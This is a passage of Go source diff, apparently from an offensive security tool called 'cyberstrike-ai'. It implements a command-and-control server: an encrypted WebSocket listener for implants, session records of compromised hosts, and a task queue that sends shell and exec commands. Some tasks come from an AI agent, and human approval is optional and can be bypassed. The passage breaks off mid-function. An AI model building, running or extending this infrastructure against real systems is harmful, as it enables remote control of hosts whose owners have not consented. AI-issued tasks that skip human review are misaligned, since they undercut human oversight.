// client → server:{"type":"checkin"|"result", "data": <ImplantCheckInRequest|TaskResultReport>}
|
||||
// server → client:{"type":"task", "data": <TaskEnvelope>} 或 {"type":"sleep","data":{"sleep":N,"jitter":J}}
|
||||
type WebSocketListener struct {
|
||||
rec *database.C2Listener
|
||||
cfg *ListenerConfig
|
||||
manager *Manager
|
||||
logger *zap.Logger
|
||||
|
||||
srv *http.Server
|
||||
upgrader websocket.Upgrader
|
||||
|
||||
mu sync.Mutex
|
||||
conns map[string]*wsConn // session_id → 连接
|
||||
stopped bool
|
||||
stopCh chan struct{}
|
||||
}
|
||||
|
||||
// wsConn 单个 WS implant 的内存状态
|
||||
type wsConn struct {
|
||||
sessionID string
|
||||
ws *websocket.Conn
|
||||
writeMu sync.Mutex // websocket 同一连接同一时间只能一个 writer
|
||||
}
|
||||
|
||||
// NewWebSocketListener 工厂(注册到 ListenerRegistry["websocket"])
|
||||
func NewWebSocketListener(ctx ListenerCreationCtx) (Listener, error) {
|
||||
return &WebSocketListener{
|
||||
rec: ctx.Listener,
|
||||
cfg: ctx.Config,
|
||||
manager: ctx.Manager,
|
||||
logger: ctx.Logger,
|
||||
stopCh: make(chan struct{}),
|
||||
conns: make(map[string]*wsConn),
|
||||
upgrader: websocket.Upgrader{
|
||||
ReadBufferSize: 4096,
|
||||
WriteBufferSize: 4096,
|
||||
// 允许任意 Origin(implant 不带 Origin 或随便填)
|
||||
CheckOrigin: func(r *http.Request) bool { return true },
|
||||
},
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Type 类型
|
||||
func (l *WebSocketListener) Type() string { return string(ListenerTypeWebSocket) }
|
||||
|
||||
// Start 启动 HTTP server 接收 WS 升级
|
||||
func (l *WebSocketListener) Start() error {
|
||||
mux := http.NewServeMux()
|
||||
wsPath := l.cfg.BeaconCheckInPath
|
||||
if wsPath == "" || wsPath == "/check_in" {
|
||||
// websocket 默认路径单独定义,避免与 HTTP Beacon 默认路径混淆
|
||||
wsPath = "/ws"
|
||||
}
|
||||
mux.HandleFunc(wsPath, l.handleWS)
|
||||
|
||||
addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort)
|
||||
ln, err := net.Listen("tcp", addr)
|
||||
if err != nil {
|
||||
if isAddrInUse(err) {
|
||||
return ErrPortInUse
|
||||
}
|
||||
return err
|
||||
}
|
||||
l.srv = &http.Server{
|
||||
Addr: addr,
|
||||
Handler: mux,
|
||||
ReadHeaderTimeout: 15 * time.Second,
|
||||
}
|
||||
go func() {
|
||||
if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) {
|
||||
l.logger.Warn("websocket Serve exited", zap.Error(err))
|
||||
}
|
||||
}()
|
||||
go l.taskDispatcherLoop()
|
||||
return nil
|
||||
}
|
||||
|
||||
// Stop 优雅关闭:通知所有 WS 客户端,关闭 server
|
||||
func (l *WebSocketListener) Stop() error {
|
||||
l.mu.Lock()
|
||||
if l.stopped {
|
||||
l.mu.Unlock()
|
||||
return nil
|
||||
}
|
||||
l.stopped = true
|
||||
close(l.stopCh)
|
||||
conns := make([]*wsConn, 0, len(l.conns))
|
||||
for _, c := range l.conns {
|
||||
conns = append(conns, c)
|
||||
}
|
||||
l.conns = make(map[string]*wsConn)
|
||||
l.mu.Unlock()
|
||||
for _, c := range conns {
|
||||
_ = c.ws.WriteControl(websocket.CloseMessage,
|
||||
websocket.FormatCloseMessage(websocket.CloseGoingAway, "shutdown"),
|
||||
time.Now().Add(time.Second))
|
||||
_ = c.ws.Close()
|
||||
}
|
||||
if l.srv != nil {
|
||||
ctx, cancel := contextWithTimeout(5 * time.Second)
|
||||
defer cancel()
|
||||
_ = l.srv.Shutdown(ctx)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (l *WebSocketListener) handleWS(w http.ResponseWriter, r *http.Request) {
|
||||
got := r.Header.Get("X-Implant-Token")
|
||||
if got == "" || l.rec.ImplantToken == "" ||
|
||||
subtle.ConstantTimeCompare([]byte(got), []byte(l.rec.ImplantToken)) != 1 {
|
||||
http.NotFound(w, r)
|
||||
return
|
||||
}
|
||||
ws, err := l.upgrader.Upgrade(w, r, nil)
|
||||
if err != nil {
|
||||
l.logger.Warn("websocket 升级失败", zap.Error(err))
|
||||
return
|
||||
}
|
||||
go l.handleConn(ws)
|
||||
}
|
||||
|
||||
// handleConn 处理一个 WS 连接的完整生命周期:等待 checkin → 登记 session → 读循环
|
||||
func (l *WebSocketListener) handleConn(ws *websocket.Conn) {
|
||||
ws.SetReadLimit(64 << 20)
|
||||
ws.SetReadDeadline(time.Now().Add(60 * time.Second))
|
||||
ws.SetPongHandler(func(string) error {
|
||||
ws.SetReadDeadline(time.Now().Add(60 * time.Second))
|
||||
return nil
|
||||
})
|
||||
|
||||
// 第一帧必须是 checkin
|
||||
frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey)
|
||||
if err != nil || frameType != "checkin" {
|
||||
_ = ws.Close()
|
||||
return
|
||||
}
|
||||
var req ImplantCheckInRequest
|
||||
if err := json.Unmarshal(body, &req); err != nil {
|
||||
_ = ws.Close()
|
||||
return
|
||||
}
|
||||
if req.SleepSeconds <= 0 {
|
||||
req.SleepSeconds = l.cfg.DefaultSleep
|
||||
}
|
||||
session, err := l.manager.IngestCheckIn(l.rec.ID, req)
|
||||
if err != nil {
|
||||
_ = ws.Close()
|
||||
return
|
||||
}
|
||||
conn := &wsConn{sessionID: session.ID, ws: ws}
|
||||
l.mu.Lock()
|
||||
l.conns[session.ID] = conn
|
||||
l.mu.Unlock()
|
||||
defer func() {
|
||||
l.mu.Lock()
|
||||
delete(l.conns, session.ID)
|
||||
l.mu.Unlock()
|
||||
_ = ws.Close()
|
||||
_ = l.manager.MarkSessionDead(session.ID)
|
||||
}()
|
||||
|
||||
// 心跳 goroutine
|
||||
pingTicker := time.NewTicker(20 * time.Second)
|
||||
defer pingTicker.Stop()
|
||||
go func() {
|
||||
for {
|
||||
select {
|
||||
case <-l.stopCh:
|
||||
return
|
||||
case <-pingTicker.C:
|
||||
conn.writeMu.Lock()
|
||||
_ = ws.WriteControl(websocket.PingMessage, nil, time.Now().Add(5*time.Second))
|
||||
conn.writeMu.Unlock()
|
||||
}
|
||||
}
|
||||
}()
|
||||
|
||||
// 主读循环:处理 result 等帧
|
||||
for {
|
||||
frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
switch frameType {
|
||||
case "result":
|
||||
var report TaskResultReport
|
||||
if err := json.Unmarshal(body, &report); err == nil {
|
||||
_ = l.manager.IngestTaskResult(report)
|
||||
}
|
||||
case "checkin":
|
||||
// 心跳更新:beacon 周期性送上心跳
|
||||
var hb ImplantCheckInRequest
|
||||
if err := json.Unmarshal(body, &hb); err == nil {
|
||||
_ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now())
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// taskDispatcherLoop 周期扫描所有活动 WS 会话,下发任务
|
||||
func (l *WebSocketListener) taskDispatcherLoop() {
|
||||
t := time.NewTicker(500 * time.Millisecond)
|
||||
defer t.Stop()
|
||||
for {
|
||||
select {
|
||||
case <-l.stopCh:
|
||||
return
|
||||
case <-t.C:
|
||||
l.mu.Lock()
|
||||
snapshot := make([]*wsConn, 0, len(l.conns))
|
||||
for _, c := range l.conns {
|
||||
snapshot = append(snapshot, c)
|
||||
}
|
||||
l.mu.Unlock()
|
||||
for _, c := range snapshot {
|
||||
envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 20)
|
||||
if err != nil || len(envelopes) == 0 {
|
||||
continue
|
||||
}
|
||||
for _, env := range envelopes {
|
||||
l.sendTaskFrame(c, env)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (l *WebSocketListener) sendTaskFrame(c *wsConn, env TaskEnvelope) {
|
||||
frame := map[string]interface{}{"type": "task", "data": env}
|
||||
body, err := json.Marshal(frame)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
enc, err := EncryptAESGCM(l.rec.EncryptionKey, body)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
c.writeMu.Lock()
|
||||
defer c.writeMu.Unlock()
|
||||
_ = c.ws.SetWriteDeadline(time.Now().Add(10 * time.Second))
|
||||
_ = c.ws.WriteMessage(websocket.TextMessage, []byte(enc))
|
||||
}
|
||||
|
||||
// readEncryptedFrame 读一帧加密 WS 文本,返回类型和明文 data
|
||||
func readEncryptedFrame(ws *websocket.Conn, key string) (string, []byte, error) {
|
||||
mt, raw, err := ws.ReadMessage()
|
||||
if err != nil {
|
||||
return "", nil, err
|
||||
}
|
||||
if mt != websocket.TextMessage && mt != websocket.BinaryMessage {
|
||||
return "", nil, errors.New("unexpected ws frame type")
|
||||
}
|
||||
plain, err := DecryptAESGCM(key, string(raw))
|
||||
if err != nil {
|
||||
return "", nil, err
|
||||
}
|
||||
var env struct {
|
||||
Type string `json:"type"`
|
||||
Data json.RawMessage `json:"data"`
|
||||
}
|
||||
if err := json.Unmarshal(plain, &env); err != nil {
|
||||
return "", nil, err
|
||||
}
|
||||
return env.Type, env.Data, nil
|
||||
}
|
||||
|
||||
// contextWithTimeout 简单封装,避免 listener 文件之间反复 import context
|
||||
func contextWithTimeout(d time.Duration) (context.Context, context.CancelFunc) {
|
||||
return context.WithTimeout(context.Background(), d)
|
||||
}
|
||||
@@ -0,0 +1,777 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"path/filepath"
|
||||
"regexp"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// Manager 是 C2 模块对外的统一门面:
|
||||
// - HTTP handler / MCP 工具 / 多代理 / 攻击链记录器 全部通过 Manager 操作 C2,
|
||||
// 不直接接触 listener 实现细节,避免循环依赖;
|
||||
// - 持有数据库句柄 + 事件总线 + 内存中的 listener 实例 map;
|
||||
// - 启动期可调用 RestoreRunningListeners() 把 status=running 的 listener 重新拉起。
|
||||
//
|
||||
// 实例化由 internal/app 负责,注入到全局 App 之后再分别交给 handler / mcp.
|
||||
type Manager struct {
|
||||
db *database.DB
|
||||
logger *zap.Logger
|
||||
bus *EventBus
|
||||
registry *ListenerRegistry
|
||||
|
||||
mu sync.RWMutex
|
||||
runningListeners map[string]Listener // listener_id → 已 Start 的 listener 实例
|
||||
storageDir string // 大结果(截图/下载)落盘根目录
|
||||
|
||||
hitlBridge HITLBridge // 危险任务在 EnqueueTask 时调它发起审批(nil 表示不接 HITL)
|
||||
hitlDangerousGate func(conversationID, mcpToolName string) bool // 与人机协同一致:为 nil 或返回 false 时不走桥
|
||||
hooks Hooks // 扩展挂钩:会话上线 / 任务完成 时通知漏洞库与攻击链
|
||||
}
|
||||
|
||||
// MCPToolC2Task 与 MCP builtin、c2_task 工具名一致,供 HITL 白名单与 Agent 侧对齐。
|
||||
const MCPToolC2Task = "c2_task"
|
||||
|
||||
// HITLBridge 把"危险任务"桥到现有 internal/handler/hitl 审批流的接口。
|
||||
// internal/app 实例化时传入;空实现表示禁用 HITL 拦截(开发期方便)。
|
||||
type HITLBridge interface {
|
||||
// RequestApproval 阻塞等待人工审批;返回 nil 表示批准,error 表示拒绝/超时。
|
||||
// ctx 携带用户/会话信息;危险任务调用时会创建超时 ctx 避免无限挂起。
|
||||
RequestApproval(ctx context.Context, req HITLApprovalRequest) error
|
||||
}
|
||||
|
||||
// HITLApprovalRequest 待审批的 C2 操作描述
|
||||
type HITLApprovalRequest struct {
|
||||
TaskID string
|
||||
SessionID string
|
||||
TaskType string
|
||||
PayloadJSON string
|
||||
ConversationID string
|
||||
Source string
|
||||
Reason string
|
||||
}
|
||||
|
||||
// Hooks 给上层(漏洞管理 / 攻击链)注入回调
|
||||
type Hooks struct {
|
||||
OnSessionFirstSeen func(session *database.C2Session) // 新会话首次上线
|
||||
OnTaskCompleted func(task *database.C2Task, sessionID string) // 任务完成(success/failed)
|
||||
}
|
||||
|
||||
// NewManager 创建 Manager;不会启动任何 listener,请显式调 RestoreRunningListeners
|
||||
func NewManager(db *database.DB, logger *zap.Logger, storageDir string) *Manager {
|
||||
if logger == nil {
|
||||
logger = zap.NewNop()
|
||||
}
|
||||
if storageDir == "" {
|
||||
storageDir = "tmp/c2"
|
||||
}
|
||||
return &Manager{
|
||||
db: db,
|
||||
logger: logger,
|
||||
bus: NewEventBus(),
|
||||
registry: NewListenerRegistry(),
|
||||
runningListeners: make(map[string]Listener),
|
||||
storageDir: storageDir,
|
||||
}
|
||||
}
|
||||
|
||||
// SetHITLBridge 设置危险任务审批桥;nil 表示禁用
|
||||
func (m *Manager) SetHITLBridge(b HITLBridge) {
|
||||
m.mu.Lock()
|
||||
m.hitlBridge = b
|
||||
m.mu.Unlock()
|
||||
}
|
||||
|
||||
// SetHITLDangerousGate 设置 C2 危险任务是否应走 HITL 桥;须与 Agent 人机协同判定一致(例如 handler.HITLManager.NeedsToolApproval)。
|
||||
// gate 为 nil 时,即使已设置桥也不会对危险任务发起审批(与未开启人机协同时其他工具行为一致)。
|
||||
func (m *Manager) SetHITLDangerousGate(gate func(conversationID, mcpToolName string) bool) {
|
||||
m.mu.Lock()
|
||||
m.hitlDangerousGate = gate
|
||||
m.mu.Unlock()
|
||||
}
|
||||
|
||||
// SetHooks 注入业务钩子
|
||||
func (m *Manager) SetHooks(h Hooks) {
|
||||
m.mu.Lock()
|
||||
m.hooks = h
|
||||
m.mu.Unlock()
|
||||
}
|
||||
|
||||
// EventBus 暴露事件总线给 SSE handler
|
||||
func (m *Manager) EventBus() *EventBus { return m.bus }
|
||||
|
||||
// DB 暴露 DB 句柄给 handler/mcptools 直接读写(避免到处包装)
|
||||
func (m *Manager) DB() *database.DB { return m.db }
|
||||
|
||||
// Logger 暴露日志句柄
|
||||
func (m *Manager) Logger() *zap.Logger { return m.logger }
|
||||
|
||||
// StorageDir 大结果落盘根目录
|
||||
func (m *Manager) StorageDir() string { return m.storageDir }
|
||||
|
||||
// Registry 暴露 listener 注册表,便于在 internal/app 启动时按 type 注册具体实现
|
||||
func (m *Manager) Registry() *ListenerRegistry { return m.registry }
|
||||
|
||||
// Close 优雅关闭:停掉所有运行中的 listener,关闭事件总线
|
||||
func (m *Manager) Close() {
|
||||
m.mu.Lock()
|
||||
listeners := make([]Listener, 0, len(m.runningListeners))
|
||||
for _, l := range m.runningListeners {
|
||||
listeners = append(listeners, l)
|
||||
}
|
||||
m.runningListeners = make(map[string]Listener)
|
||||
m.mu.Unlock()
|
||||
for _, l := range listeners {
|
||||
_ = l.Stop()
|
||||
}
|
||||
m.bus.Close()
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// Listener 生命周期
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
// CreateListenerInput Web/MCP 创建监听器的入参(已校验 + 已 trim)
|
||||
type CreateListenerInput struct {
|
||||
Name string
|
||||
Type string
|
||||
BindHost string
|
||||
BindPort int
|
||||
ProfileID string
|
||||
Remark string
|
||||
Config *ListenerConfig
|
||||
// CallbackHost 非空时写入 config_json.callback_host,供 Payload 默认回连(不修改 bind)
|
||||
CallbackHost string
|
||||
}
|
||||
|
||||
// CreateListener 校验并落库;不自动启动(与 systemd unit 一致:先创建后启动)
|
||||
func (m *Manager) CreateListener(in CreateListenerInput) (*database.C2Listener, error) {
|
||||
if strings.TrimSpace(in.Name) == "" {
|
||||
return nil, ErrInvalidInput
|
||||
}
|
||||
if !IsValidListenerType(in.Type) {
|
||||
return nil, ErrUnsupportedType
|
||||
}
|
||||
if err := SafeBindPort(in.BindPort); err != nil {
|
||||
return nil, &CommonError{Code: "invalid_port", Message: err.Error(), HTTP: 400}
|
||||
}
|
||||
bindHost := strings.TrimSpace(in.BindHost)
|
||||
if bindHost == "" {
|
||||
bindHost = "127.0.0.1" // 默认绑定环回,需要外网时操作员显式改
|
||||
}
|
||||
cfg := in.Config
|
||||
if cfg == nil {
|
||||
cfg = &ListenerConfig{}
|
||||
} else {
|
||||
cp := *cfg
|
||||
cfg = &cp
|
||||
}
|
||||
if ch := strings.TrimSpace(in.CallbackHost); ch != "" {
|
||||
cfg.CallbackHost = ch
|
||||
}
|
||||
cfg.ApplyDefaults()
|
||||
cfgJSON, err := json.Marshal(cfg)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("marshal listener config: %w", err)
|
||||
}
|
||||
keyB64, err := GenerateAESKey()
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("generate key: %w", err)
|
||||
}
|
||||
tokenB64, err := GenerateImplantToken()
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("generate token: %w", err)
|
||||
}
|
||||
|
||||
listener := &database.C2Listener{
|
||||
ID: "l_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14],
|
||||
Name: strings.TrimSpace(in.Name),
|
||||
Type: strings.ToLower(strings.TrimSpace(in.Type)),
|
||||
BindHost: bindHost,
|
||||
BindPort: in.BindPort,
|
||||
ProfileID: strings.TrimSpace(in.ProfileID),
|
||||
EncryptionKey: keyB64,
|
||||
ImplantToken: tokenB64,
|
||||
Status: "stopped",
|
||||
ConfigJSON: string(cfgJSON),
|
||||
Remark: strings.TrimSpace(in.Remark),
|
||||
CreatedAt: time.Now(),
|
||||
}
|
||||
if err := m.db.CreateC2Listener(listener); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已创建", listener.Name), map[string]interface{}{
|
||||
"listener_id": listener.ID,
|
||||
"type": listener.Type,
|
||||
})
|
||||
return listener, nil
|
||||
}
|
||||
|
||||
// StartListener 启动指定 listener;幂等(已运行时返回 ErrListenerRunning)
|
||||
func (m *Manager) StartListener(id string) (*database.C2Listener, error) {
|
||||
rec, err := m.db.GetC2Listener(id)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if rec == nil {
|
||||
return nil, ErrListenerNotFound
|
||||
}
|
||||
m.mu.Lock()
|
||||
if _, ok := m.runningListeners[id]; ok {
|
||||
m.mu.Unlock()
|
||||
return rec, ErrListenerRunning
|
||||
}
|
||||
m.mu.Unlock()
|
||||
|
||||
cfg := &ListenerConfig{}
|
||||
if rec.ConfigJSON != "" {
|
||||
_ = json.Unmarshal([]byte(rec.ConfigJSON), cfg)
|
||||
}
|
||||
cfg.ApplyDefaults()
|
||||
|
||||
// 通过工厂创建具体实现
|
||||
factory := m.registry.Get(rec.Type)
|
||||
if factory == nil {
|
||||
return nil, ErrUnsupportedType
|
||||
}
|
||||
inst, err := factory(ListenerCreationCtx{
|
||||
Listener: rec,
|
||||
Config: cfg,
|
||||
Manager: m,
|
||||
Logger: m.logger.With(zap.String("listener_id", rec.ID), zap.String("type", rec.Type)),
|
||||
})
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if err := inst.Start(); err != nil {
|
||||
now := time.Now()
|
||||
_ = m.db.SetC2ListenerStatus(rec.ID, "error", err.Error(), &now)
|
||||
m.publishEvent("warn", "listener", "", "", fmt.Sprintf("监听器 %s 启动失败: %v", rec.Name, err), map[string]interface{}{
|
||||
"listener_id": rec.ID,
|
||||
})
|
||||
return nil, err
|
||||
}
|
||||
m.mu.Lock()
|
||||
m.runningListeners[rec.ID] = inst
|
||||
m.mu.Unlock()
|
||||
now := time.Now()
|
||||
_ = m.db.SetC2ListenerStatus(rec.ID, "running", "", &now)
|
||||
rec.Status = "running"
|
||||
rec.StartedAt = &now
|
||||
rec.LastError = ""
|
||||
m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已启动", rec.Name), map[string]interface{}{
|
||||
"listener_id": rec.ID,
|
||||
"bind": fmt.Sprintf("%s:%d", rec.BindHost, rec.BindPort),
|
||||
})
|
||||
return rec, nil
|
||||
}
|
||||
|
||||
// StopListener 停止;幂等(未运行时返回 ErrListenerStopped)
|
||||
func (m *Manager) StopListener(id string) error {
|
||||
m.mu.Lock()
|
||||
inst, ok := m.runningListeners[id]
|
||||
if ok {
|
||||
delete(m.runningListeners, id)
|
||||
}
|
||||
m.mu.Unlock()
|
||||
if !ok {
|
||||
return ErrListenerStopped
|
||||
}
|
||||
if err := inst.Stop(); err != nil {
|
||||
return err
|
||||
}
|
||||
_ = m.db.SetC2ListenerStatus(id, "stopped", "", nil)
|
||||
rec, _ := m.db.GetC2Listener(id)
|
||||
name := id
|
||||
if rec != nil {
|
||||
name = rec.Name
|
||||
}
|
||||
m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已停止", name), map[string]interface{}{
|
||||
"listener_id": id,
|
||||
})
|
||||
return nil
|
||||
}
|
||||
|
||||
// DeleteListener 停止并删除(级联 sessions/tasks/files)
|
||||
func (m *Manager) DeleteListener(id string) error {
|
||||
_ = m.StopListener(id)
|
||||
return m.db.DeleteC2Listener(id)
|
||||
}
|
||||
|
||||
// IsListenerRunning 内存中的运行状态(DB 中的 status 可能因崩溃而过时)
|
||||
func (m *Manager) IsListenerRunning(id string) bool {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
_, ok := m.runningListeners[id]
|
||||
return ok
|
||||
}
|
||||
|
||||
// RestoreRunningListeners 启动期把 DB 中 status=running 的 listener 重新拉起;
|
||||
// 失败的会被改为 status=error,不会阻塞整个 App 启动。
|
||||
func (m *Manager) RestoreRunningListeners() {
|
||||
listeners, err := m.db.ListC2Listeners()
|
||||
if err != nil {
|
||||
m.logger.Warn("恢复 C2 listener 失败:列表查询出错", zap.Error(err))
|
||||
return
|
||||
}
|
||||
for _, l := range listeners {
|
||||
if l.Status != "running" {
|
||||
continue
|
||||
}
|
||||
if _, err := m.StartListener(l.ID); err != nil && !errors.Is(err, ErrListenerRunning) {
|
||||
m.logger.Warn("恢复 C2 listener 失败", zap.String("listener_id", l.ID), zap.Error(err))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// Session 生命周期
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
// IngestCheckIn beacon 上线/心跳的统一入口。
|
||||
// 行为:
|
||||
// 1. 若 implant_uuid 已有会话 → 更新心跳/状态
|
||||
// 2. 否则创建新会话,触发 OnSessionFirstSeen 钩子
|
||||
func (m *Manager) IngestCheckIn(listenerID string, req ImplantCheckInRequest) (*database.C2Session, error) {
|
||||
if strings.TrimSpace(req.ImplantUUID) == "" {
|
||||
return nil, ErrInvalidInput
|
||||
}
|
||||
existing, err := m.db.GetC2SessionByImplantUUID(req.ImplantUUID)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
now := time.Now()
|
||||
isFirstSeen := existing == nil
|
||||
var sessID string
|
||||
if existing != nil {
|
||||
sessID = existing.ID
|
||||
} else {
|
||||
sessID = "s_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
|
||||
}
|
||||
session := &database.C2Session{
|
||||
ID: sessID,
|
||||
ListenerID: listenerID,
|
||||
ImplantUUID: req.ImplantUUID,
|
||||
Hostname: req.Hostname,
|
||||
Username: req.Username,
|
||||
OS: strings.ToLower(req.OS),
|
||||
Arch: strings.ToLower(req.Arch),
|
||||
PID: req.PID,
|
||||
ProcessName: req.ProcessName,
|
||||
IsAdmin: req.IsAdmin,
|
||||
InternalIP: req.InternalIP,
|
||||
UserAgent: req.UserAgent,
|
||||
SleepSeconds: req.SleepSeconds,
|
||||
JitterPercent: req.JitterPercent,
|
||||
Status: string(SessionActive),
|
||||
FirstSeenAt: now,
|
||||
LastCheckIn: now,
|
||||
Metadata: req.Metadata,
|
||||
}
|
||||
if existing != nil {
|
||||
// 保留原 ID/FirstSeenAt/Note,避免被覆盖
|
||||
session.FirstSeenAt = existing.FirstSeenAt
|
||||
if session.Note == "" {
|
||||
session.Note = existing.Note
|
||||
}
|
||||
}
|
||||
if err := m.db.UpsertC2Session(session); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if isFirstSeen {
|
||||
m.publishEvent("critical", "session", session.ID, "",
|
||||
fmt.Sprintf("新会话上线: %s@%s (%s/%s)", session.Username, session.Hostname, session.OS, session.Arch),
|
||||
map[string]interface{}{
|
||||
"session_id": session.ID,
|
||||
"listener_id": listenerID,
|
||||
"hostname": session.Hostname,
|
||||
"os": session.OS,
|
||||
"arch": session.Arch,
|
||||
"internal_ip": session.InternalIP,
|
||||
})
|
||||
m.mu.RLock()
|
||||
hook := m.hooks.OnSessionFirstSeen
|
||||
m.mu.RUnlock()
|
||||
if hook != nil {
|
||||
go hook(session)
|
||||
}
|
||||
}
|
||||
// 普通心跳:last_check_in 已由 UpsertC2Session 写入 c2_sessions,不再落 c2_events。
|
||||
// 否则按 sleep 周期每条心跳一条审计,库表与 SSE 会被迅速撑爆;上线/掉线等仍照常 publishEvent。
|
||||
return session, nil
|
||||
}
|
||||
|
||||
// MarkSessionDead 心跳超时检测器调用:标记会话为 dead
|
||||
func (m *Manager) MarkSessionDead(sessionID string) error {
|
||||
if err := m.db.SetC2SessionStatus(sessionID, string(SessionDead)); err != nil {
|
||||
return err
|
||||
}
|
||||
m.publishEvent("warn", "session", sessionID, "", "会话已离线(心跳超时)", nil)
|
||||
return nil
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// Task 生命周期
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
// EnqueueTaskInput 下发任务入参
|
||||
type EnqueueTaskInput struct {
|
||||
SessionID string
|
||||
TaskType TaskType
|
||||
Payload map[string]interface{}
|
||||
Source string // manual|ai|batch|api
|
||||
ConversationID string
|
||||
UserCtx context.Context // 给 HITL 用
|
||||
BypassHITL bool // true 表示跳过 HITL 审批(仅供白名单机制 / 系统内部用)
|
||||
}
|
||||
|
||||
// EnqueueTask 入队一个新任务;若任务类型危险且未 BypassHITL,且 SetHITLDangerousGate 对当前会话与 MCPToolC2Task 返回 true,才会调 HITL 桥审批。
|
||||
// 返回任务记录;任务派发由 PopTasksForBeacon 在 beacon 拉任务时完成。
|
||||
func (m *Manager) EnqueueTask(in EnqueueTaskInput) (*database.C2Task, error) {
|
||||
if strings.TrimSpace(in.SessionID) == "" {
|
||||
return nil, ErrInvalidInput
|
||||
}
|
||||
session, err := m.db.GetC2Session(in.SessionID)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if session == nil {
|
||||
return nil, ErrSessionNotFound
|
||||
}
|
||||
if session.Status == string(SessionDead) || session.Status == string(SessionKilled) {
|
||||
return nil, &CommonError{Code: "session_inactive", Message: "会话已离线,无法下发任务", HTTP: 409}
|
||||
}
|
||||
|
||||
// OPSEC: command deny regex enforcement
|
||||
if in.TaskType == TaskTypeExec || in.TaskType == TaskTypeShell {
|
||||
cmd, _ := in.Payload["command"].(string)
|
||||
if cmd != "" {
|
||||
listenerCfg := m.getListenerConfig(session.ListenerID)
|
||||
if listenerCfg != nil {
|
||||
for _, pattern := range listenerCfg.CommandDenyRegex {
|
||||
re, err := regexp.Compile(pattern)
|
||||
if err != nil {
|
||||
m.logger.Warn("invalid command_deny_regex", zap.String("pattern", pattern), zap.Error(err))
|
||||
continue
|
||||
}
|
||||
if re.MatchString(cmd) {
|
||||
return nil, &CommonError{
|
||||
Code: "command_denied",
|
||||
Message: fmt.Sprintf("命令被 OPSEC 规则拒绝 (匹配: %s)", pattern),
|
||||
HTTP: 403,
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// OPSEC: max_concurrent_tasks enforcement
|
||||
listenerCfg := m.getListenerConfig(session.ListenerID)
|
||||
if listenerCfg != nil && listenerCfg.MaxConcurrentTasks > 0 {
|
||||
activeTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{
|
||||
SessionID: in.SessionID,
|
||||
Status: string(TaskQueued),
|
||||
})
|
||||
sentTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{
|
||||
SessionID: in.SessionID,
|
||||
Status: string(TaskSent),
|
||||
})
|
||||
concurrent := len(activeTasks) + len(sentTasks)
|
||||
if concurrent >= listenerCfg.MaxConcurrentTasks {
|
||||
return nil, &CommonError{
|
||||
Code: "concurrent_limit",
|
||||
Message: fmt.Sprintf("会话已有 %d 个排队/执行中的任务,超过并发上限 %d", concurrent, listenerCfg.MaxConcurrentTasks),
|
||||
HTTP: 429,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
taskID := "t_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
|
||||
task := &database.C2Task{
|
||||
ID: taskID,
|
||||
SessionID: in.SessionID,
|
||||
TaskType: string(in.TaskType),
|
||||
Payload: in.Payload,
|
||||
Status: string(TaskQueued),
|
||||
Source: strOr(in.Source, "manual"),
|
||||
ConversationID: in.ConversationID,
|
||||
CreatedAt: time.Now(),
|
||||
}
|
||||
|
||||
// HITL 检查:仅当注入的 gate 认为当前会话应对统一 MCP 工具 c2_task 做人机协同时才走桥(关闭人机协同时与其它工具一致,直接入队)。
|
||||
if IsDangerousTaskType(in.TaskType) && !in.BypassHITL {
|
||||
m.mu.RLock()
|
||||
bridge := m.hitlBridge
|
||||
gate := m.hitlDangerousGate
|
||||
m.mu.RUnlock()
|
||||
convID := strings.TrimSpace(in.ConversationID)
|
||||
useBridge := bridge != nil && gate != nil && gate(convID, MCPToolC2Task)
|
||||
if useBridge {
|
||||
task.ApprovalStatus = "pending"
|
||||
if err := m.db.CreateC2Task(task); err != nil {
|
||||
return nil, err
|
||||
